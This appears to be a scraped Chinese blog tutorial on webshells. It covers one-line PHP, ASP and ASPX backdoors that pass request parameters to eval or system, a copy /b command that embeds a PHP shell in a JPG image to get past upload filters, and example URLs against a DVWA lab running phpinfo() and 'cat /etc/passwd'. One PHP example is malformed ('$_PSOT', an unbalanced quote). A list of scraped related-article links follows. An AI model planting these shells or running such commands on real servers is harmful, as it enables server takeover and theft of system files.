webshell
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数
大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到
图片马:一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。

php 文章后面有几种php木马实践

<?php @eval('$_PSOT['admin']);?>
<?php eval($_REQUEST['admin']);?>
<?php system($_REQUEST['admin']);?>

asp

<%eval request ("admin")%>

aspx

<%@ Page Language="Jscript"%> <%eval(Request.Item["admin"],"unsafe");%>

原理:
以 php 的一句话木马为例,<?php @eval('$_PSOT['admin']);?> 语句能作为木马,其原理是利用 php 中的 eval 函数,将传入的任何语句作为 php 语句执行,因此当传入该木马时,通过访问该文件,以 post 方式传入参数,eval 函数再将接收的语句作为 php 语句执行,这就构成了连接。
其中admin是一个变量名,用来接收语句,也可以称之为密码。
@ 在php中的作用是抑制错误提示。
例如:加入已植入该木马,使用 POST 方式接收参数 phpinfo(),再通过 eval 将其作为php语句执行,就查看了站点的 php 信息。

图片马
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
使用语句 生成图片马:

copy 图片.jpg/b + 木马.php/a 木马.jpg/b 表示以二进制方式打开
/a 表示以ASCII方式打

介绍php的几种
shell.php 使用php函数 菜刀连接
<?php @eval('$_PSOT['admin']);?>

shell2.php #eveal 使用php函数,例如phpinfo();
<?php eval($_REQUEST['admin']);?>
http://192.168.0.7/dvwa/hackable/uploads/shell.php?admin=phpinfo();

**
post是想用中国菜刀之类的工具连接获取shell,是C/S架构。
request是在网页端输入变量访问**

shell3.php #systeam使用linux系统命令,例如ls,cat,rm,cp
<?php system($_REQUEST['admin']);?>
http://192.168.8.134/dvwa/hackable/uploads/shell3.php?yangge=cat /etc/passwd

文件上传 webshell 各类型 一句话木马 图片马 制作 教程相关推荐

  1. 文件上传 文件大小和类型

    文件上传 文件大小和类型 一.文件上传 二.文件大小和类型

  2. vue实战--vue+elementUI实现多文件上传+预览(word/PDF/图片/docx/doc/xlxs/txt)

    需求 最近在做vue2.0+element UI的项目中遇到了一个需求:需求是多个文件上传的同时实现文件的在线预览功能.需求图如下: 看到这个需求的时候,小栗脑袋一炸.并不知道该如何下手,之前的实践项 ...

  3. java多文件上传plupload控件实现多图片上传(二)

    接上篇 java多文件上传plupload控件实现多图片上传(一) 续写PluploadUtil 和 Plupload PO类,以及后台的action. 至此,可实现多文件上传功能. 上传文件Acti ...

  4. 使用ajax实现文件上传,使用input实现本地图片展示

    使用ajax实现文件上传,使用input实现本地图片展示 一.实现本地图片预览 HTML: <input type="file" id="chooseImage&q ...

  5. 文件上传漏洞 随便贴一个实战演示 BUU Upload(文件上传,过滤后缀,另类一句话) write up

    http://39.96.86.88/2020/04/03/ write up 文件上传 write up 文件上传 0x01 文件上传绕过 1.客户端js检查绕过 原理:客户端通过js检查提交的文件 ...

  6. php文件上传绕过mime类型,文件上传限制绕过技巧

    严正声明:本文仅限于技术讨论,严禁用于其他用途. 简介 文件上传漏洞是web安全中经常利用到的一种漏洞形式.一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以 ...

  7. [网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗(六)

    这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...

  8. php文件上传(mime类型大全)

    这篇文章针对于PHP初学者,对高手来说可能没有什么意义.好,我们开始. 首先要建立一个文件夹和两个文件,具体如下: File ------ 文件夹,用于存放上传的文件. choose.htm ---- ...

  9. php文件上传及mime类型大全

    一些题外话,抱怨一下,不要介意.还是进入正题吧,我这里讨论很浅,仅仅是思路,以上传txt格式的文件为例,深层次的扩展这里就不讨论了,因此这篇文章只适合PHP初学者,对高手来说可能没有什么意义.好,我们 ...

最新文章

  1. iptables 定义规则
  2. protoc gen php,protoc-gen-php --php_out: protoc-gen-php: Plugin output is unparseable.
  3. 为什么Kafka中的分区数只能增加不能减少?
  4. 试试回答Frankyang的问题-什么样的人适合攻读博士学位?
  5. Get Start from today
  6. 南理工计算机技术专业学位,南京理工大学计算机技术(专业学位)考研难吗
  7. Python版本的报数游戏
  8. 金秋十月丹桂飘香,送3本书更香
  9. poster--2011 Pacific-RimConference on Multimedia
  10. python 通过模板生成文章_自动生成文章_python自动生成文章 - 云+社区 - 腾讯云
  11. java获取当前系统时间
  12. 成人大专计算机自我鉴定300字,自我鉴定300字成人大专
  13. 2021年啤酒酿造行业发展研究报告
  14. 常兴串口调试助手v3.6
  15. 2012-2013最新泰晤士报和QS世界大学排名前100名单对比
  16. smartbi连接mysql数据库_数据源连接 - Smartbi V7 帮助中心 - Smartbi 在线知识中心
  17. java定义一个长方形类,该类中具有长方形长宽两种属性,并具有相应的构造方法属性访问方法,计算长方形的周长和面积的方法,要求输出长是5,宽是4的长方形
  18. 教你自制一款简单的助听器
  19. Ext3、Ext4、FAT、FAT32、NTFS、exFAT、Sparse、Raw
  20. SQL-44 将id=5以及emp_no=10001的行数据替换成id=5以及emp_no=10005,其他数据保持不变,使用replace实现。...

热门文章

  1. Python Recap 重新审视Python - 1 Python中的类
  2. oracle数据库应用与开发习题,oracle数据库应用与开发答案
  3. Ubuntu18.04安装坚果云
  4. Time-Evolving Graph Convolutional Recurrent Network for Traffic Prediction论文笔记
  5. 产品结构图 VS 信息结构图 VS 功能结构图(附案例)
  6. V2X消息之SPAT消息解读
  7. 自定义制作音频播放器_使用HTML5制作音频播放器,第1部分:功能和设计
  8. 初学者如何3步入门选吉他,附上新手购琴常见问题和吉他品牌推荐
  9. C - Matrix Reducing
  10. 《一切都是最好的安排》脑图